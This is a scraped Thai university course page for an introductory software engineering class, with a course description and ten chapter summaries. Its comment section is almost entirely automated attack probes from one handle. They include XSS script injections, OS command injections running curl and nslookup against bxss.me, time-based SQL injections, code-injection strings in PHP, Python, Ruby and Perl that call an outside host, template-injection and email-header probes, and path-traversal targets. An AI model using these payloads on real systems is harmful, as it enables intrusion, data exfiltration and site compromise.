7152305 วิศวกรรมซอฟต์แวร์เบื้องต้น

Responsive image

7152305 วิศวกรรมซอฟต์แวร์เบื้องต้น

คำอธิบายรายวิชา
แนะนำกระบวนการพัฒนาซอฟต์แวร์ และวงจรชีวิตการพัฒนาซอฟต์แวร์ โดยเฉพาะแบบจำลองการพัฒนาแบบวนรอบและเพิ่มพูนโดยใช้วิธีพัฒนาโปรแกรมเชิงอ็อบเจกต์ หัวข้อที่มีการสอนได้แก่ การเก็บรวบรวมความต้องการของผู้ใช้ การวิเคราะห์และออกแบบระบบโดยใช้ยูเอ็มแอล (UML) การทดสอบระบบ เฟรมเวิร์คและเอพีไอ สถาปัตยกรรมแบบ client-server การวิเคราะห์ ออกแบบและพัฒนาระบบ client-server อย่างง่าย และเทคโนโลยีที่เกี่ยวข้องกับส่วนต่อประสานกับผู้ใช้ นอกจากนี้ยังแนะนำกลยุทธ์การพัฒนาซอฟต์แวร์สมัยใหม่

จำนวนการเข้าชม
11453 ครั้ง
ผู้เข้าชมภายนอก
3337 ครั้ง
คะแนนรายวิชา
คะแนน: 4.67 จากทั้งหมด 28 คะแนน

บทที่ 1 Software-problems and prospects

ความเป็นมา เป้าหมาย ของวิศวกรรมซอฟต์แวร์ ปัญหาความยากง่ายในการจัดการโครงการซอฟต์แวร์ขนาดใหญ่ การวิเคราะห์ปัญหาด้านวิศวกรรมซอฟต์แวร์
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : Software-problems and prospects


บทที่ 2 กระบวนการพัฒนาซอฟต์แวร์

กระบวนการทางวิศวกรรมซอฟต์แวร์ คือ การใช้ระเบียบวิธี เทคนิค เครื่องมือช่วย และกระบวนการพัฒนาซอฟต์แวร์ที่ชัดเจน ซึ่งสามารถตรวจสอบได้ เพื่อทำให้เกิดมาตรฐานเดียวกัน และให้ซอฟต์แวร์มีประสิทธิภาพสูงสุด ในทางปฏิบัติจริง
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : กระบวนการพัฒนาซอฟต์แวร์


บทที่ 3 การพัฒนาซอฟต์แวร์แบบเอจายล์

การพัฒนาซอฟต์แวร์แบบเอจายล์ คือ แนวคิดใหม่ของกระบวนการพัฒนาซอฟต์แวร์ที่มีลักษณะการทำงานแบบวนซ้ำ โดยมุ่งเน้นการพัฒนาซอฟต์แวร์ให้มีความก้าวหน้าและเป็นไปตามมาตรฐานที่วางไว้ เน้นการสื่อสารระหว่างผู้พัฒนา กับผู้ใช้/ลูกค้า เน้นสื่อสารมากกว่าใช้เอกสาร มีเอกสารที่เกี่ยวข้องไม่มาก เวลาที่ใช้ในการพัฒนาซอฟต์แวร์ไม่นาน ส่งมอบกับลูกค้าได้อย่างรวดเร็ว ทำให้ประหยัดเวลาและค่าใช้จ่าย
วิดีโอการสอน


บทที่ 4 การบริหารโครงการซอฟต์แวร์

เป้าหมายหลักของการบริหารโครงการซอฟต์แวร์ คือ โครงการซอฟต์แวร์ที่ถูกพัฒนาขึ้นต้อง สร้างความพึงพอใจ ได้รับการยอมรับจากลูกค้าหรือผู้ใช้ ต้องมีคุณภาพสูง ความปลอดภัยสูง ค่าใช้จ่ายต่ำ เสร็จภายในเวลาที่กำหนด จัดสรรเครื่องมือและทรัพยากรทั้งหมดให้เกิดประโยชน์สูงสุด
วิดีโอการสอน


บทที่ 5 วิศวกรรมความต้องการ

กระบวนการที่ทำให้วิศวกรซอฟต์แวร์เข้าใจและเข้าถึงความต้องการของลูกค้าได้อย่างถูกต้อง
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : วิศวกรรมความต้องการ


บทที่ 6 การวิเคราะห์ซอฟต์แวร์

การวิเคราะห์ซอฟต์แวร์ นักวิเคราะห์ระบบจะสร้างแบบจำลอง เพื่อให้ทีมนักพัฒนาซอฟต์แวร์มีความเข้าใจตรงกันกับลูกค้าหรือผู้ใช้แบบจำลอง คือ สัญลักษณ์ที่ใช้จำลองข้อเท็จจริงต่าง ๆ ที่เกิดขึ้นในระบบ ประกอบด้วย แผนภาพต่าง ๆ แบบจำลองเป็นเครื่อง แบบจำลองสะท้อนให้เห็นถึงความต้องการระบบอย่างชัดเจนว่าทำหน้าที่อะไร
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : การวิเคราะห์ซอฟต์แวร์


บทที่ 7 การออกแบบซอฟต์แวร์

เป็นขั้นตอนที่ทำหลังจากขั้นตอนของการวิเคราะห์ซอฟแวร์ ซึ่งการออกแบบซอฟต์แวร์หมายถึง กระบวนการกำหนดสถาปัตยกรรม ส่วนประกอบ ส่วนต่อประสาน และด้านอื่น ๆ
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : การออกแบบซอฟต์แวร์


บทที่ 8 การออกแบบเชิงสถาปัตยกรรม

ขั้นตอนการออกแบบซอฟต์แวร์ สถาปนิกซอฟต์แวร์ (Software Architect) จะต้องพิจารณาลักษณะโครงสร้างของซอฟต์แวร์ ประกอบด้วย ส่วนประกอบ และความสัมพันธ์ระหว่างส่วนประกอบและคำนึงถึงรูปแบบเชิงสถาปัตยกรรมของซอฟต์แวร์ การออกแบบซอฟต์แวร์ แบ่งเป็น 2 ประเภท การออกแบบเชิงสถาปัตยกรรม (Architectural Design) การออกแบบเชิงละเอียด (Detailed Design)
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : การออกแบบเชิงสถาปัตยกรรม


บทที่ 9 การออกแบบส่วนต่อประสานกับผู้ใช้

ส่วนต่อประสานกับผู้ใช้ เป็นกระบวนการสำคัญในการพัฒนาซอฟต์แวร์ และมีผลต่อการเลือกใช้ซอฟต์แวร์เป็นอย่างมากเนื่องจากส่วนต่อประสานกับผู้ใช้จะแสดงรูปหรือสัญลักษณ์ต่าง ๆ บนจอภาพ เพื่อสื่อความหมายให้กับผู้ใช้ หากส่วนนี้สร้างความประทับใจให้ผู้ใช้ จะช่วยโน้มน้าวให้ผู้ใช้ยอมรับซอฟต์แวร์ได้ง่ายขึ้น
วิดีโอการสอน


บทที่ 10 การทดสอบซอฟต์แวร์

นักทดสอบระบบจะนำโปรแกรมมาตรวจสอบความถูกต้องทางด้านภาษาคำสั่ง และ ฟังก์ชันการทำงาน เพื่อพิจารณาซอฟต์แวร์ที่ได้มานั้นตรงตามความต้องการของผู้ใช้หรือไม่
วิดีโอการสอน

ดาวน์โหลดไฟล์เอกสาร

         ไฟล์นำเสนอ .ppt : การทดสอบซอฟต์แวร์


Comments


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=4576-4372&h=4576-c41c3-2&"></script>


lxbfYeaa

555


lxbfYeaa

course2.php


lxbfYeaa

course2.php


lxbfYeaa

course2.php/.


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

http://hitkmiivzbrpq.bxss.me/


lxbfYeaa

hitkmiivzbrpq.bxss.me


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


lxbfYeaa

555


lxbfYeaa

xfs.bxss.me


lxbfYeaa

961852


lxbfYeaa

http://xfs.bxss.me?ac.th


lxbfYeaa

xfs.bxss.me?ac.th


lxbfYeaa

//xfs.bxss.me?ac.th


lxbfYeaa

/xfs.bxss.me?ac.th


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

response.write(9549602*9631672)


lxbfYeaa

'+response.write(9549602*9631672)+'


lxbfYeaa

"+response.write(9549602*9631672)+"


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

"+"A".concat(70-3).concat(22*4).concat(110).concat(72).concat(110).concat(70)+(require"socket" Socket.gethostbyname("hitqv"+"wjtgcaeyb790f.bxss.me.")[3].to_s)+"


lxbfYeaa

'+'A'.concat(70-3).concat(22*4).concat(101).concat(67).concat(105).concat(76)+(require'socket' Socket.gethostbyname('hitem'+'guiakjvl2cae2.bxss.me.')[3].to_s)+'


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

echo afkbuh$() jqbicsnz^xyu||a #' &echo afkbuh$() jqbicsnz^xyu||a #|" &echo afkbuh$() jqbicsnz^xyu||a #


lxbfYeaa

&echo xcakjm$() wpgtrknz^xyu||a #' &echo xcakjm$() wpgtrknz^xyu||a #|" &echo xcakjm$() wpgtrknz^xyu||a #


lxbfYeaa

|echo skvzdh$() hmvbnrnz^xyu||a #' |echo skvzdh$() hmvbnrnz^xyu||a #|" |echo skvzdh$() hmvbnrnz^xyu||a #


lxbfYeaa

(nslookup -q=cname hitprynfvytjie782e.bxss.me||curl hitprynfvytjie782e.bxss.me))


lxbfYeaa

$(nslookup -q=cname hithvsncojtsoa3549.bxss.me||curl hithvsncojtsoa3549.bxss.me)


lxbfYeaa

&nslookup -q=cname hitnsjweqvnbrc0d31.bxss.me&'"`0&nslookup -q=cname hitnsjweqvnbrc0d31.bxss.me&`'


lxbfYeaa

&(nslookup -q=cname hitkzbwotmsrp988a7.bxss.me||curl hitkzbwotmsrp988a7.bxss.me)&'"`0&(nslookup -q=cname hitkzbwotmsrp988a7.bxss.me||curl hitkzbwotmsrp988a7.bxss.me)&`'


lxbfYeaa

|(nslookup -q=cname hitlhhzdqueyt1d3e9.bxss.me||curl hitlhhzdqueyt1d3e9.bxss.me)


lxbfYeaa

`(nslookup -q=cname hitgmrmizztvkb850b.bxss.me||curl hitgmrmizztvkb850b.bxss.me)`


lxbfYeaa

;(nslookup -q=cname hitxeoruesvupd0853.bxss.me||curl hitxeoruesvupd0853.bxss.me)|(nslookup -q=cname hitxeoruesvupd0853.bxss.me||curl hitxeoruesvupd0853.bxss.me)&(nslookup -q=cname hitxeoruesvupd0853.bxss.me||curl hitxeoruesvupd0853.bxss.me)


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

GNi2sCeS


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555 bcc:074625.4576-4378.4576.c41c3.19425.2@bxss.me


lxbfYeaa

to@example.com> bcc:074625.4576-4379.4576.c41c3.19425.2@bxss.me


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

12345'"'");|]*{ <>?''????


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555<esi:include src="http://bxss.me/rpb.png"/>


lxbfYeaa

555


lxbfYeaa

${10000106+9999208}


lxbfYeaa

555


lxbfYeaa

'.gethostbyname(lc('hityq'.'qplrztqh73e8f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(73).chr(113).chr(71).'


lxbfYeaa

".gethostbyname(lc("hitmr"."pueexcmwaae3e.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(77).chr(110).chr(84)."


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

'"()


lxbfYeaa

555'&&sleep(27*1000)*zagrzh&&'


lxbfYeaa

555"&&sleep(27*1000)*uwofpu&&"


lxbfYeaa

555'||sleep(27*1000)*xruimj||'


lxbfYeaa

555"||sleep(27*1000)*dvsicg||"


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


lxbfYeaa

';print(md5(31337));$a='


lxbfYeaa

";print(md5(31337));$a="


lxbfYeaa

${@print(md5(31337))}


lxbfYeaa

${@print(md5(31337))}


lxbfYeaa

'.print(md5(31337)).'


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hiteyetxvfcwj3620b.'+'bxss.me')


lxbfYeaa

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hiteyetxvfcwj3620b."+"bxss.me")+'


lxbfYeaa

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hiteyetxvfcwj3620b.'+'bxss.me')+"


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

)


lxbfYeaa

!(()&&!|*|*|


lxbfYeaa

^(#$!@#$)(()))******


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

HttP://bxss.me/t/xss.html?%00


lxbfYeaa

bxss.me/t/xss.html?%00


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

'"


lxbfYeaa

<!--


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555'"()&%<zzz><ScRiPt >Fv1c(9063)</ScRiPt>


lxbfYeaa

'"()&%<zzz><ScRiPt >Fv1c(9176)</ScRiPt>


lxbfYeaa

5559251221


lxbfYeaa

bfg8168<s1﹥s2ʺs3ʹhjl8168


lxbfYeaa

bfgx1253??z1??z2a?bcxhjl1253


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

555<ScRiPt >Fv1c(9307)</ScRiPt>


lxbfYeaa

555<WSAIF3>LZB48[!+!]</WSAIF3>


lxbfYeaa

555<script>Fv1c(9706)</script>


lxbfYeaa

555<ScR<ScRiPt>IpT>Fv1c(9140)</sCr<ScRiPt>IpT>


lxbfYeaa

555<ScRiPt >Fv1c(9188)</ScRiPt>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9336></ScRiPt>


lxbfYeaa

555<ScRiPt >Fv1c(9776)</ScRiPt>


lxbfYeaa

555<svg ?onload=Fv1c(9562);>


lxbfYeaa

555<isindex type=image src=1 onerror=Fv1c(9489)>


lxbfYeaa

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9051'>


lxbfYeaa

555<body onload=Fv1c(9563)>


lxbfYeaa

555<img src=//xss.bxss.me/t/dot.gif onload=Fv1c(9227)>


lxbfYeaa

555<img src=xyz OnErRor=Fv1c(9202)>


lxbfYeaa

555<img/src=">" onerror=alert(9599)>


lxbfYeaa

%35%35%35%3C%53%63%52%69%50%74%20%3E%46%76%31%63%289979%29%3C%2F%73%43%72%69%70%54%3E


lxbfYeaa

555u003CScRiPtFv1c(9215)u003C/sCripTu003E


lxbfYeaa

555&lt;ScRiPt&gt;Fv1c(9762)&lt;/sCripT&gt;


lxbfYeaa

?<img zzz onmouseover=Fv1c(96621) //?>


lxbfYeaa

555<input autofocus onfocus=Fv1c(9316)>


lxbfYeaa

<a HrEF=http://xss.bxss.me></a>


lxbfYeaa

<a HrEF=jaVaScRiPT:>


lxbfYeaa

555}body{zzz:Expre/**/SSion(Fv1c(9568))}


lxbfYeaa

555tNepe <ScRiPt >Fv1c(9485)</ScRiPt>


lxbfYeaa

555<WOTMLT>LZTR5[!+!]</WOTMLT>


lxbfYeaa

555<ifRAme sRc=9695.com></IfRamE>


lxbfYeaa

555<aaEFifh x=9214>


lxbfYeaa

555<img sRc='http://attacker-9482/log.php?


lxbfYeaa

555<a0Uu2ll<


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

1YQeaPbnO


lxbfYeaa

555


lxbfYeaa

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


lxbfYeaa

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


lxbfYeaa

Http://bxss.me/t/fit.txt


lxbfYeaa

http://bxss.me/t/fit.txt?.jpg


lxbfYeaa

/etc/shells


lxbfYeaa

c:/windows/win.ini


lxbfYeaa

bxss.me


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555&n904466=v984233


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

-1 OR 2+252-252-1=0+0+0+1 --


lxbfYeaa

-1 OR 3+252-252-1=0+0+0+1 --


lxbfYeaa

-1 OR 3*2<(0+5+252-252) --


lxbfYeaa

-1 OR 3*2>(0+5+252-252) --


lxbfYeaa

-1 OR 2+638-638-1=0+0+0+1


lxbfYeaa

-1 OR 3+638-638-1=0+0+0+1


lxbfYeaa

-1 OR 3*2<(0+5+638-638)


lxbfYeaa

-1 OR 3*2>(0+5+638-638)


lxbfYeaa

if(now()=sysdate(),sleep(15),0)


lxbfYeaa

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


lxbfYeaa

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


lxbfYeaa

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


lxbfYeaa

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


lxbfYeaa

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


lxbfYeaa

1'"


lxbfYeaa

1????%2527%2522


lxbfYeaa

@@hwGSo


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555


lxbfYeaa

555'"()&%<zzz><ScRiPt >GcrU(9386)</ScRiPt>


lxbfYeaa

'"()&%<zzz><ScRiPt >GcrU(9863)</ScRiPt>


lxbfYeaa

555'"()&%<zzz><ScRiPt >7QKl(9976)</ScRiPt>


lxbfYeaa

555'"()&%<zzz><ScRiPt >zt1u(9065)</ScRiPt>


lxbfYeaa

'"()&%<zzz><ScRiPt >7QKl(9006)</ScRiPt>


lxbfYeaa

555'"()&%<zzz><ScRiPt >TnBV(9825)</ScRiPt>


lxbfYeaa

555'"()&%<zzz><ScRiPt >zVXr(9980)</ScRiPt>


lxbfYeaa

555'"()&%<zzz><ScRiPt >P7FF(9760)</ScRiPt>


lxbfYeaa

555'"()&%<zzz><ScRiPt >tOiK(9915)</ScRiPt>


lxbfYeaa

5559654986


lxbfYeaa

'"()&%<zzz><ScRiPt >zVXr(9970)</ScRiPt>


lxbfYeaa

5559196530


lxbfYeaa

'"()&%<zzz><ScRiPt >zt1u(9328)</ScRiPt>


lxbfYeaa

'"()&%<zzz><ScRiPt >tOiK(9299)</ScRiPt>


lxbfYeaa

'"()&%<zzz><ScRiPt >P7FF(9870)</ScRiPt>


lxbfYeaa

bfg2898<s1﹥s2ʺs3ʹhjl2898


lxbfYeaa

5559821651


lxbfYeaa

555'"()&%<zzz><ScRiPt >DByA(9403)</ScRiPt>


lxbfYeaa

'"()&%<zzz><ScRiPt >TnBV(9387)</ScRiPt>


lxbfYeaa

5559496611


lxbfYeaa

5559306630


lxbfYeaa

bfg3238<s1﹥s2ʺs3ʹhjl3238


lxbfYeaa

bfg4278<s1﹥s2ʺs3ʹhjl4278


lxbfYeaa

5559315523


lxbfYeaa

'"()&%<zzz><ScRiPt >DByA(9051)</ScRiPt>


lxbfYeaa

bfg8016<s1﹥s2ʺs3ʹhjl8016


lxbfYeaa

5559912030


lxbfYeaa

bfg5054<s1﹥s2ʺs3ʹhjl5054


lxbfYeaa

bfgx2493??z1??z2a?bcxhjl2493


lxbfYeaa

bfgx1602??z1??z2a?bcxhjl1602


lxbfYeaa

5559135030


lxbfYeaa

bfgx6801??z1??z2a?bcxhjl6801


lxbfYeaa

bfgx1214??z1??z2a?bcxhjl1214


lxbfYeaa

bfg1107<s1﹥s2ʺs3ʹhjl1107


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

bfg5661<s1﹥s2ʺs3ʹhjl5661


lxbfYeaa

bfgx2376??z1??z2a?bcxhjl2376


lxbfYeaa

bfgx2925??z1??z2a?bcxhjl2925


lxbfYeaa

bfg10651<s1﹥s2ʺs3ʹhjl10651


lxbfYeaa

555'"()&%<zzz><ScRiPt >VD8u(9682)</ScRiPt>


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

'"()&%<zzz><ScRiPt >VD8u(9489)</ScRiPt>


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

bfgx6962??z1??z2a?bcxhjl6962


lxbfYeaa

bfgx8281??z1??z2a?bcxhjl8281


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

555'"()&%<zzz><ScRiPt >tgfP(9691)</ScRiPt>


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

5559917848


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

bfg3642<s1﹥s2ʺs3ʹhjl3642


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

'"()&%<zzz><ScRiPt >tgfP(9968)</ScRiPt>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

bfgx10980??z1??z2a?bcxhjl10980


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

5559545735


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

555<ScRiPt >GcrU(9871)</ScRiPt>


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

555<WGMA1J>ISAL7[!+!]</WGMA1J>


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

bfg8655<s1﹥s2ʺs3ʹhjl8655


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

555<ScRiPt >zVXr(9482)</ScRiPt>


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

555<WD7Y5B>LVO8L[!+!]</WD7Y5B>


lxbfYeaa

bfgx1732??z1??z2a?bcxhjl1732


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

555<script>zVXr(9003)</script>


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

555<script>GcrU(9955)</script>


lxbfYeaa

555<ScR<ScRiPt>IpT>zVXr(9007)</sCr<ScRiPt>IpT>


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

<%={{={@{#{${dfb}}%>


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

555<ScR<ScRiPt>IpT>GcrU(9677)</sCr<ScRiPt>IpT>


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

555<ScRiPt >TnBV(9663)</ScRiPt>


lxbfYeaa

555<ScRiPt >zt1u(9344)</ScRiPt>


lxbfYeaa

555<ScRiPt >7QKl(9341)</ScRiPt>


lxbfYeaa

555<ScRiPt >P7FF(9074)</ScRiPt>


lxbfYeaa

<th:t="${dfb}#foreach


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

555<ScRiPt >tOiK(9308)</ScRiPt>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

555<ScRiPt >zVXr(9293)</ScRiPt>


lxbfYeaa

555<WANASQ>VJ5TX[!+!]</WANASQ>


lxbfYeaa

555<WWZX8N>BLGCC[!+!]</WWZX8N>


lxbfYeaa

555<ScRiPt >GcrU(9850)</ScRiPt>


lxbfYeaa

555<WG3ZYJ>AXWLS[!+!]</WG3ZYJ>


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

555<script>TnBV(9039)</script>


lxbfYeaa

555<script>zt1u(9917)</script>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9983></ScRiPt>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9851></ScRiPt>


lxbfYeaa

555<ScRiPt >DByA(9744)</ScRiPt>


lxbfYeaa

555<ScR<ScRiPt>IpT>TnBV(9947)</sCr<ScRiPt>IpT>


lxbfYeaa

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


lxbfYeaa

555<WKYRYA>GE2WD[!+!]</WKYRYA>


lxbfYeaa

555<WO8TYN>NJHAU[!+!]</WO8TYN>


lxbfYeaa

555<WBADCS>5FSEE[!+!]</WBADCS>


lxbfYeaa

555<ScR<ScRiPt>IpT>zt1u(9584)</sCr<ScRiPt>IpT>


lxbfYeaa

555<ScRiPt >TnBV(9064)</ScRiPt>


lxbfYeaa

555<script>7QKl(9249)</script>


lxbfYeaa

dfb{{98991*97996}}xca


lxbfYeaa

555<script>DByA(9371)</script>


lxbfYeaa

555<ScRiPt >zVXr(9321)</ScRiPt>


lxbfYeaa

555<ScRiPt >zt1u(9053)</ScRiPt>


lxbfYeaa

555<ScRiPt >GcrU(9868)</ScRiPt>


lxbfYeaa

555<svg ?onload=zVXr(9384);>


lxbfYeaa

dfb__${98991*97996}__::.x


lxbfYeaa

555<ScR<ScRiPt>IpT>7QKl(9656)</sCr<ScRiPt>IpT>


lxbfYeaa

555<svg ?onload=GcrU(9575);>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9570></ScRiPt>


lxbfYeaa

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


lxbfYeaa

dfb[[${98991*97996}]]xca


lxbfYeaa

555<ScR<ScRiPt>IpT>DByA(9495)</sCr<ScRiPt>IpT>


lxbfYeaa

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9432></ScRiPt>


lxbfYeaa

555<isindex type=image src=1 onerror=zVXr(9557)>


lxbfYeaa

555<ScRiPt >TnBV(9953)</ScRiPt>


lxbfYeaa

555<script>P7FF(9258)</script>


lxbfYeaa

555<ScRiPt >VD8u(9624)</ScRiPt>


lxbfYeaa

555<isindex type=image src=1 onerror=GcrU(9756)>


lxbfYeaa

555<script>tOiK(9654)</script>


lxbfYeaa

555<ScRiPt >DByA(9169)</ScRiPt>


lxbfYeaa

